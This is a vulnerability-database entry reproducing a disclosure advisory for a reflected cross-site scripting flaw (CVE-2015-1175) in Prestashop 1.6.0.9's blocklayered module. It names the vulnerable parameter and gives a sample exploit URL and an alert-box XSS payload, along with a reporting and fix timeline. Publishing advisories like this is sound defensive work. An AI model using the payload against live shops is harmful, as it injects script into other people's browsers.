Lucene search
Sudhanshu Chauhan1337DAY-ID-23165HistoryJan 21, 2015 - 12:00 a.m.
Prestashop 1.6.0.9 Cross Site Scripting Vulnerability
2015-01-2100:00:00
Sudhanshu Chauhan
0day.today
82
0.003 Low
EPSS
Percentile
69.1%
Prestashop version 1.6.0.9 suffers from a cross site scripting vulnerability.
CVE-2015-1175-xss-prestashop
Information
āāāāāāā
Advisory by Octogence.
Name: Reflected XSS Vulnerability in prestashop ecommerce software
Affected Software : Prestashop
Affected Versions: 1.6.0.9 and possibly below
Vendor Homepage : https://www.prestashop.com/
Vulnerability Type : Cross-site Scripting
Severity : High
CVE ID: CVE-2015-1175
Impact
āā
An attacker can craft a URL with malicious JavaScript code which
executes in the browser.
Technical Details
āāāāāā
Sample URL:
http://localhost/prestashop/prestashop/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_7&id_category_layered=8&layered_price_slider=16_532f363<img%20src%3da%20onerror%3dalert(1)>9c032&orderby=position&orderway=asctrue&_=1420314938300
Parameter:
layered_price_slider
Sample Payload:
<img src=a onerror=alert(1)>
For more information on cross-site scripting vulnerabilities read the
following article:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Advisory Timeline (mm/dd/yyyy)
āāāāāāā
01/07/2015 ā Reported
01/12/2015 ā Vulnerability Fixed
01/18/2015 ā Advisory Released
http://octogence.com/advisories/cve-2015-1175-xss-prestashop/
# 0day.today [2018-01-01] #Related
openvas
openvas
Prestashop < 1.6.0.11 Reflected Cross Site Scripting Vulnerability
2014-12-17 00:00:00
securityvulns
securityvulns
CVE-2015-1175-xss-prestashop
2015-01-25 00:00:00
cvelist
cvelist
CVE-2015-1175
2015-01-22 16:00:00
cve
cve
CVE-2015-1175
2015-01-22 16:59:00
packetstorm
packetstorm
Prestashop 1.6.0.9 Cross Site Scripting
2015-01-20 00:00:00
nvd
nvd
CVE-2015-1175
2015-01-22 16:59:00
prion
prion
Cross site scripting
2015-01-22 16:59:00